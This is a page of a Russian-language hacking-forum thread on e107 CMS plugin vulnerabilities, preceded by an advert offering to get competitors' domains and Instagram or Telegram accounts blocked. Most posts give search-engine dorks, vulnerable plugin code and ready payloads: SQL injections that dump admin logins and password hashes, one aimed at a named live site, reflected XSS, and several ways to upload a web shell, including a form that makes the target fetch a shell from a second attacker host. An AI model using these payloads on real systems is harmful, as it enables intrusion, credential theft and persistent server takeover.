УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
[ Обзор уязвимостей e107 cms ]

Страница 7 из 8

« Первая

Опции темы

Поиск в этой теме

Опции просмотра

#61

02.05.2010, 18:10

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

AACGC Hall of Shame v1.6 by ~M@CH!N3~
07:27 02-Apr-10
скачать

Blind SQL inj
гугл- inurl:e107_plugins/aacgc_hos
[path]/e107_plugins/aacgc_hos/HOS_Details.php

PHP код:

...require_once("../../class2.php"); require_once(HEADERF); if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } //------------------------------------------------------------------------------------------------------------ $text .= "<center><table style='width:90%' class='indent' cellspacing='' cellpadding=''>"; $sql->db_Select("aacgc_hos", "*", "WHERE hos_id = $sub_action",""); $row = $sql->db_Fetch();...

плюс - никаких условий.
минус - надо знать hos_id.

Результат:
Пусть hos_id=1 и 5 ветка
http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=5 - есть контент!
http://[host]/[path]/e107_plugins/aacgc_hos/HOS_details.php?.1 and substring(version(),1,1)=4 - нет контента!

ps с "+" контент не выводился (если в гет пихать)

Последний раз редактировалось Strilo4ka; 02.05.2010 в 18:37..

#62

02.05.2010, 19:11

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

AACGC BFBC2 Stats v1.3 by ~M@CH!N3~
скачать

2-d order inj
гугл- inurl:e107_plugins/aacgc_bfbcstats
[path]/e107_plugins/aacgc_bfbcstats/Member_Details.php

PHP код:

...require_once("../../class2.php"); require_once(HEADERF); if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } if ($pref['bfbc_enable_gold'] == "1"){$gold_obj = new gold();} //--------------------------------------------------------------- $title .= "Battlefield Bad Company 2 Member Details"; //--------------------------------------------------------------- $sql ->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action",""); $row = $sql->db_Fetch(); $sql2 ->db_Select("user", "*", "WHERE user_id='".$row['user_extended_id']."'",""); $row2 = $sql2->db_Fetch(); if ($pref['bfbc_enable_gold'] == "1"){ $username = "".$gold_obj->show_orb($row2['user_id'])."";} else {$username = "".$row2['user_name']."";} if ($pref['bfbc_enable_avatar'] == "1"){ if ($row2['user_image'] == "") {$avatar = "";} else {$useravatar = $row2[user_image]; require_once(e_HANDLER."avatar_handler.php"); $useravatar = avatar($useravatar); $avatar = "<img src='".$useravatar."' width=".$pref['bfbc_avatar_size']."px></img>";}} $bfbcname = $row['user_bfbc2']; //------------------------------------------------------ $text .= "<table style='width:100%' class=''>"; $text .= " <tr> <td bgcolor='#000000'><center><img src='".e_PLUGIN."aacgc_bfbcstats/images/bfbc2banner.jpg'></img></center></td> </tr>";...

Результат:
хексим:
Код:
' union select 1,concat_ws(user_loginname,':',user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from e107_user limit 0,1--
Код:
http://host//path/e107_plugins/aacgc_bfbcstats/Member_Details.php?.1%20and%200%20union%20select%200x2720756e696f6e2073656c65637420312c636f6e6361745f777328757365725f6c6f67696e6e616d652c273a272c757365725f70617373776f7264292c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c33302c33312066726f6d20653130375f75736572206c696d697420302c312d2d20,2
Цитата:

Username: :admin21232f297a57a5a743894a0e4a801fc3 ()

Пути:
http://[host]/[path]/e107_plugins/aacgc_bfbcstats/kits.php
http://[host]/[path]/e107_plugins/aacgc_bfbcstats/general.php
http://[host]/[path]/e107_plugins/aacgc_bfbcstats/teams.php
http://[host]/[path]/e107_plugins/aacgc_bfbcstats/BFBC2_menu.php

ps
- "+" заменяем на " ";
- незабываем за шелл через 2-ой запрос.

Последний раз редактировалось Strilo4ka; 02.05.2010 в 19:46..

#63

02.05.2010, 20:21

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Advanced Ranking and Medal System v1.5 by MikeNL
21:44 31-Jan-10
скачать

SQL inj
гугл- inurl:e107_plugins/advmedsys
[path]/e107_plugins/advmedsys/advmedsys_view.php

PHP код:

...require_once("../../class2.php"); require_once(HEADERF); //-----------------------------------------------------------------------------------------------------------+ //-----------------------------------------------------------------------------------------------------------+ if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } $lan_file = e_PLUGIN."advmedsys/languages/".e_LANGUAGE.".php"; require_once(file_exists($lan_file) ? $lan_file : e_PLUGIN."advmedsys/languages/English.php"); //-----------------------------------------------------------------------------------------------------------+ if ($action == "main" || $action == "") {...

PHP код:

...if ($action == "det") { $width = "width:100%"; $text .= " <div style='text-align:center'> <br><a href='advmedsys_view.php'><center>[ ".AMS_VIEW_S9." ]</center></a><br> <table style='".$width."' class='fborder' cellspacing='0' cellpadding='0'> <tr> <td style='width:80px' class='forumheader3'><center>".AMS_VIEW_S1."</td> <td style='width:100%' class='forumheader3'>".AMS_VIEW_S2."</td> </tr>"; $sql->db_Select("advmedsys_medals", "*", "WHERE medal_id = $sub_action",""); $row = $sql->db_Fetch(); $text .= " <tr> <td style='width:80px' class='forumheader3'><img src='medalimg/".$row['medal_pic']."' alt = '".AMS_VIEW_S1."'></img></td> <td style='width:100%; vertical-align:middle' class='forumheader3'>".$row['medal_name']."</td> </tr> </table> <br></br>...

Далее по коду 2-d order inj.

Результат:
http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user

http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,concat_ws(0x3a,user_loginname,user_password),3,4 from e107_user limit 0,1

пример:
http://www.truescap.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*! and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user*/

Последний раз редактировалось Strilo4ka; 02.05.2010 в 21:00..

#64

03.05.2010, 02:55

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Как лить шелл через админку.

Способ 1.
Если в e107_admin/ есть filetypes.php, то можно устанавливать плагины!

По умолчанию этот файл называеться filetypes_.php, тоесть лить неззя.

Тогда такой massage:
An error has occurred, unable to un-archive the file PCLZIP extract error: 'PCLZIP_ERR_MISSING_FILE (-4)'

Но если filetypes.php, то берем madnet шелл (или wso etc чтоб никого не обидеть! ^_^), выкачиваем плагин (любой!), распаковываем, пыхаем туда наш шелл, архивируем, ну и устанавливаем плагин.

Пробывал на Spam Cleaner v1.0 by martinj - размер 2.7 кб. [скачан отсюдо]

и если ниче не блочит типо mod_security
http://[host]/[path]/e107_plugins/spamcleaner/our_shell.php

Способ 2.
Такой же, только через установку новой темы в админке Theme Manager -> Upload Theme.
http://[host]/[path]/e107_themes/mew_team/our_shell.php

ps
1. Проверял на последней сборке!
2. Делимся способами заливки! ):

up

Способ 3.
Через бажный плагин если таковой имееться.

Цитата:

№1

Как лить шелл (не имея прав админа!).

Способ 1
Бажный плагин.

Цитата:

№1

№2

Последний раз редактировалось Strilo4ka; 06.05.2010 в 05:09..

1234567

#65

03.05.2010, 19:44

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

1234567

ех,вкусная бреш!
плагин за 2009 год, скачан отсюдо

гугл- inurl:e107_plugins/radio_plan/

http://[host]/[path]/e107_plugins/radio_plan/admin/upload.php

PHP код:

...include "../configuration.php";     include "../includes/functions.inc.php";     if($_FILES){         if(move_uploaded_file($_FILES['pic']['tmp_name'], '../images/' . get('target') . '/' . $_FILES['pic']['name'])){             echo "Upload erfolgreich";             $image_path = '../images/' . get('target') . '/';             // Bilder  in der Grosse anpassen             //$act_image = $_FILES['pic']['name']; //            $image_parts = explode('.', $act_image, -1); //            $image_name = $image_parts[0]; //            $image_parts = explode('.', $act_image); //            $image_ext = array_pop($image_parts); // //            $full_image = $image_name . '.full.' . $image_ext; //            $thumb_image = $image_name . '.thumb.' . $image_ext; // //            image_resize($image_path . $act_image, $image_full_width, $image_full_height, $image_path . $full_image, $image_ext); //            image_resize($image_path . $act_image, $image_thumb_width, $image_thumb_height, $image_path . $thumb_image, $image_ext); //         //    unlink($image_path . $act_image);         }         else             echo "Upload fehlgeschlagen";...

[path]/e107_plugins/radio_plan/includes/functions.inc.php

PHP код:

...function get($var, $flag = ''){     $let_get = TRUE;     if(strpos("/POST", $var) === FALSE){         $let_get = FALSE;         $var = ereg_replace("/POST", "",  $var);     }     if(isset($_POST[$var]))         return $_POST[$var];     else if(isset($_GET[$var]) && $let_get == FALSE)         return $_GET[$var];     else if(isset($_FILES[$var][$flag]) && $let_get == FALSE)         return $_FILES[$var][$flag];     else         return FALSE; }...

Когда лил шелл на локале - была ошибка, но понял что у меня PHP Version 5.3.1
И это связано с этим:

Цитата:

Note: As of PHP 5.3.0, the regex extension is deprecated in favor of the PCRE extension. Calling this function will issue an E_DEPRECATED notice. See the list of differences for help on converting to PCRE.

заменил на:

PHP код:

$var = preg_replace("@/POST@", "",  $var);

Уря ):

http://[host]/[path]/e107_plugins/radio_plan/images/our_sell.php

ps
на целевом ниче не надо менять.
забыл, пост слать не надо, там сразу форма с загрузкой файла выводиться когда обращаемся к скрипту upload.php ):

Последний раз редактировалось Strilo4ka; 03.05.2010 в 20:45..

#66

05.05.2010, 18:49

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Alternate Profiles
выкачал отсюдо

гугл- inurl:e107_plugins/alternate_profiles

./e107_plugins/alternate_profiles/db_upgrade.php

PHP код:

... if(isset($_GET['con'])) { $start = $_GET['start']; $end = $_GET['end']; $query = mysql_query("SELECT * FROM ".MPREFIX."alternate_profiles LIMIT $start,$end"); $rows = mysql_num_rows($query); if (isset($_GET['count'])) { $count = $_GET['count']; $first = $_GET['start'] - 2; echo "Users #".$first." to #".$count." have been updated.<br/>"; } else {...

PHP код:

...$split = explode("[||]",$row['user_custompage']); if ($split[0] == "0019283") { $array = Array(); $array['Mood'] = $split[1]; $array['Status'] = $split[2]; $array['Orientation'] = $split[3]; $array['Hometown'] = $split[4]; $array['Ethnicity'] = $split[5]; $array['Occupation'] = $split[6]; $array['Music'] = $split[7]; $array['Films/Television'] = $split[8]; $array['Favourite_Books'] = $split[9]; $array['aboutme'] = $split[10]; $db = serialize($array); mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_custompage='".$db."', user_simple='1' WHERE user_id=".$row['user_id']." "); unset($array); $count++; echo "Updated user #".$row['user_id']."<br/>"; } else { mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_simple='0' WHERE user_id=".$row['user_id']." "); }...

Результат:
passive XSS
http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1&count=<script>ale rt(123)</script>

blind SQL inj
чтоб крутить в результат первого запроса надо впихнуть:0019283[||], ну понятно лучше захексить, чтоб обойти кавычки ):

Пусть 5 вертка

http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=5
A total of 1 profiles have been upgraded - true

http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=4
A total of 0 profiles have been upgraded - false

плюс - никаких условий

#67

06.05.2010, 01:45

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

гугл- inurl:e107_plugins/rank_system/recommend.php

target: http://[host]/[path]/e107_plugins/rank_system/recommend.php

passive XSS
/e107_plugins/rank_system/recommend.php

PHP код:

...$recomm = new recommend(); if (isset($_POST['nextstep']) ) { $recomm_action = $_POST['recomm_action']; } else { $recomm_action = ""; }...

PHP код:

....else if ($recomm_action == 'submit') { $type = intval($_POST['recomm_type']); $target = intval($_POST['recomm_target']); $t_name = $_POST['t_name']; $r_for = intval($_POST['recomm_for']); $r_remarks = $tp->toDB($_POST['recomm_remarks']); if ($recomm->submitRecomm($target, $type, $r_for, $r_remarks)) { $msg = RANKS_RM_11; } else { $msg = RANKS_RM_12; } $rank_text .= ' <table class="rsborder" style="' . USER_WIDTH . '"> <tr> <td class="rscaption" style="text-align:left">' . RANKS_RM_01 . ' [' . $t_name .']</td>...

Результат (установить постом!):
nextstep = любое зн.
recomm_action=submit
t_name= xss

ps
сработает тока у авторизированого!

Последний раз редактировалось Strilo4ka; 06.05.2010 в 01:55..

#68

06.05.2010, 02:15

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

TiltViewer v1.2 by The_Death_Raw
Если уставновлен,то повезло. скачать

Заливаем шельца!
гугл- inurl:e107_plugins/tiltviewer
http://[host]/[path]/e107_plugins/tiltviewer/gestion_fichiers.php

PHP код:

...// fonction upload foreach ($_FILES["filez"]["error"] as $key => $error) { if ($error == UPLOAD_ERR_OK) { $tmp_name = $_FILES["filez"]["tmp_name"][$key]; $name = $_FILES["filez"]["name"][$key]; move_uploaded_file($tmp_name, "./uploads/$name"); Header("Location: ".$_SERVER['PHP_SELF'].""); }...

Выбираем наш шелл и Send the files
http://[host]/[path]/e107_plugins/tiltviewer/uploads/name_our_shell.php

ps заходил под админом и тогда лил, хоть и нужны права но мб пригодиться

др. способы заливки

Последний раз редактировалось Strilo4ka; 06.05.2010 в 02:57..

#69

06.05.2010, 05:04

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

FileDownload Advanced v2.0 by The Hunter
скачать

гугл- inurl:e107_plugins/FileDownload

http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php

PHP код:

require_once("config.php"); require_once("functions.php"); if ($_GET["dir"]) $dir = $_GET["dir"]; else $dir = $_POST["dir"]; if ($_POST["numfiles"]) $numfiles = $_POST["numfiles"]; else $numfiles = 4; if ((isset($_POST["hide"])) and (isset($dir))) { for ($x = 1; $_POST["file".$x]; $x++) { $file = $_POST["file".$x]; $copy = copy($file,$dir."/".getFileName($file)); $upload_ok .= "<tr><td style='width:100%' colspan=8 class='header2'>Uploaded:" . getFileName($file) . " successfully.</td></tr>"; } }

./config.php

PHP код:

//$expPrefPass=''; $expBaseDir='../'; $expSortOrder=0; $expDisplaySearch... Как видно первая строка закоментирована. ...

./functions

PHP код:

require_once("config.php"); if (isset($_COOKIE["phpFileDownload_login"])) if ($_COOKIE["phpFileDownload_login"] != $expPrefPass) header ("location: login.php");... И посему нет никакой переадресации если куки не устанавливать. ): ...function getFileName ($file) { $strlen = strlen($file); $retfile = ""; while ($strlen > 0) { $_g = substr(substr($file, $strlen, strlen($file)), 0, 1); if (($_g == "\\") or ($_g == "/")) break; $retfile = substr($file, $strlen, strlen($file)); $strlen = $strlen-1; } return $retfile; }...

Результат:

Цитата:

Функция copy
Замечание: Начиная с PHP версии 4.3.0, оба параметра, source и dest, могут быть URL'ами, если были включены "упаковщики fopen"

Заливаем на хостинг шелл или с своего розшареного.

Посылаем запрос:
<form action="http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php" method=post>
<input type=hidden name=hide value=0><br>
<input type=text name="file1" value='http://[host2]/[path]/shell.php'><br>
<input type=text name=dir value=log><br>
<input type=submit>
</form>

Наш шелл:
http://[host]/[path]/FileDownload/filedownload/log/shell.php

ps др. способы заливки

Последний раз редактировалось Strilo4ka; 06.05.2010 в 05:10..

#70

28.05.2010, 16:05

ReckouNT

Новичок

Регистрация: 16.01.2009

Сообщений: 17

Провел на форуме:
31738

Репутация: 2

Подскажите уязвимости в ядре 0.7.17, с этой версии были выпущены заплатки на какие то уязвимости - (хз на какие)
Через плагины поломать невозможно, т.к. из плагинов юзается лишь guestbook.

Последний раз редактировалось ReckouNT; 28.05.2010 в 16:10..

Страница 7 из 8

« Первая

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов	it's my	Сценарии/CMF/СMS	184	15.06.2010 11:10
[ Обзор уязвимостей PHP-Nuke ]	[53x]Shadow	Сценарии/CMF/СMS	42	07.05.2010 19:07
[ Обзор уязвимостей SLAED CMS ]	_kREveDKo_	Сценарии/CMF/СMS	20	01.11.2009 14:28
Обзор бесплатных Cms	em00s7	PHP, PERL, MySQL, JavaScript	16	03.07.2009 13:13
CMS vs "изготовление на коленках"	vadim_samoilov	Чужие Статьи	8	19.08.2008 02:10

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход